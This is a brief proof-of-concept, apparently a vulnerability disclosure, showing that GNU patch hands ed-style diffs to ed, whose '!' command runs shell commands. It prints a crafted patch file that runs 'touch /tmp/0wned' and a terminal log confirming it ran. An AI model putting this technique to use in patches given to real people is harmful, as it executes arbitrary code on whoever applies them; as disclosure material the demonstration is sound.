patch runs ed, and ed can run anything

$ cat evil.patch 
--- /dev/null   2018-13-37 13:37:37.000000000 +0100                            
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100                            
1337a                                                                          
1,112d                                                                         
!touch /tmp/0wned; ls -la /tmp/0wned
.                                                                              
$ patch < evil.patch 
?
?
-rw-r--r-- 1 edu users 0 Apr  5 10:42 /tmp/0wned
?
patch: **** /usr/bin/ed FAILED
$ 

Source: patch runs ed, and ed can run anything